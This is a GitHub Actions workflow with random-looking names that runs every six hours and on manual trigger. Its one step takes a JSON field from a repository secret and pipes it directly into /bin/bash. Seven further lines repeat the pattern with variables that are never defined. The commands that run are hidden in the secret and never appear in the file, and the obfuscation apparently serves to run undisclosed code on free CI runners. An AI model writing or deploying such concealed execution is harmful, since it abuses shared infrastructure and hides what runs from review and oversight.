name: caocao19870104

on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870104
        env:
          czc5: ${{ secrets.czc5 }}
        run: |
          echo $czc5 | jq -r .rehg92912 | /bin/bash
          echo $adctz396 | jq -r .oodma49584 | /bin/bash
          echo $uqmj11496 | jq -r .cbdl6 | /bin/bash
          echo $gscuv1197 | jq -r .gp2 | /bin/bash
          echo $k281 | jq -r .nan12685 | /bin/bash
          echo $f5651 | jq -r .rbjy11 | /bin/bash
          echo $vkahi6559 | jq -r .lolhe55538 | /bin/bash
          echo $h8982 | jq -r .n00947 | /bin/bash

